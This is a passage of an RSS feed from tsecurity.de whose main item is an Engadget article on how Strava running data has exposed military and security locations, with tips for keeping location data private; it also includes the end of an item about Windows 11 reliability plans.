<pubDate>Fri, 20 Mar 2026 20:53:13 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft detailed today how it plans to improve the performance and reliability of Windows 11 throughout 2026.</p>
<p>The post <a href="https://www.thurrott.com/windows/334044/heres-how-microsoft-plans-to-improve-windows-11s-performance-and-reliability-in-2026">Here’s How Microsoft Plans to Improve Windows 11’s Performance and Reliability in 2026</a> appeared first on <a href="https://www.thurrott.com/">Thurrott.com</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here's how not to leak military information with your Strava run]]></title>
<description><![CDATA[A French officer recently leaked the location of an aircraft carrier because of a run on the sports app Strava. This is not the first time this has happened, as the app tracks location data.
It was used to access the location of US military bases back in 2018 and members of the Secret Service acc...]]></description>
<link>https://tsecurity.de/de/3367806/it-nachrichten/heres-how-not-to-leak-military-information-with-your-strava-run/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3367806/it-nachrichten/heres-how-not-to-leak-military-information-with-your-strava-run/</guid>
<pubDate>Fri, 20 Mar 2026 19:46:34 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A French officer recently <a data-i13n="cpos:1;pos:1" href="https://www.bbc.com/news/articles/cd9vdel17wqo"><ins>leaked the location of an aircraft carrier</ins></a> because of a run on the sports app Strava. This is not the first time this has happened, as the app tracks location data.</p>
<p>It was used to access the location of <a data-i13n="cpos:2;pos:1" href="https://www.theguardian.com/world/2018/jan/28/fitness-tracking-app-gives-away-location-of-secret-us-army-bases"><ins>US military bases back in 2018</ins></a> and members of the Secret Service accidentally shared their whereabouts <a data-i13n="cpos:3;pos:1" href="https://apnews.com/article/biden-trump-macron-bodyguards-security-strava-0a48afca09c7aa74d703e72833dcaf72"><ins>while protecting then-US President Joe Biden</ins></a>. The same has happened to President Trump and other world leaders.</p>
<span></span><div><blockquote class="twitter-tweet"><p lang="en" dir="ltr">🚨🇫🇷 NEW: The location of the French aircraft carrier, FS Charles de Gaulle, has been given away by a sailor using Strava whilst jogging on the ship deck<br><br>[<a href="https://twitter.com/lemondefr?ref_src=twsrc%5Etfw">@lemondefr</a>] <a href="https://t.co/FuoKMAs06w">pic.twitter.com/FuoKMAs06w</a></p>— Politics Global (@PolitlcsGlobal) <a href="https://twitter.com/PolitlcsGlobal/status/2034726710680150024?ref_src=twsrc%5Etfw">March 19, 2026</a></blockquote>
 

</div>
<p>In other words, the use of Strava to track runs is becoming a global security risk, but it doesn't have to be. If you happen to find yourself in an undisclosed location as part of a military entourage, here are a couple of ways to keep things private.</p>
<h2>Change the settings</h2>
<p>Don't want to give up those Strava runs? <a data-i13n="cpos:4;pos:1" href="https://support.strava.com/hc/en-us/articles/18345030915085-Options-for-Sharing-Personal-Information">Just change the settings</a>. On the web, click on "Do Not Share My Personal Information" on the feed page and then look for "Opt Out."</p>
<p>This is also fairly easy for smartphone users. Just head to "Privacy Controls" for the app and follow the prompts on both iOS and Android. Both versions include an option to disable the sharing of personal information, including location data.</p>
<h2>Use another running app</h2>
<p>Most sports apps track location data, but they don't all share Strava's spotty history. There are plenty of apps out there to choose from, <a data-i13n="cpos:5;pos:1" href="https://www.engadget.com/2019-11-08-the-best-motivation-fitness-apps.html"><ins>and some are quite good</ins></a>. No matter which one you download, be sure to take steps to change the privacy settings.</p>
<h2>Run the old-fashioned way</h2>
<p>Believe it or not, people still jogged before smartphones. Just lace up a pair of shoes and get out there. For extra protection, leave your phone and smartwatch at home.</p>
<h2>Get a treadmill</h2>
<p>Are you stuck on an aircraft carrier somewhere in the middle of the ocean? It could be tough to get your steps in, so consider bothering the top brass for a treadmill.</p>This article originally appeared on Engadget at https://www.engadget.com/apps/heres-how-not-to-leak-military-information-with-your-strava-run-183635879.html?src=rss]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,12ms -->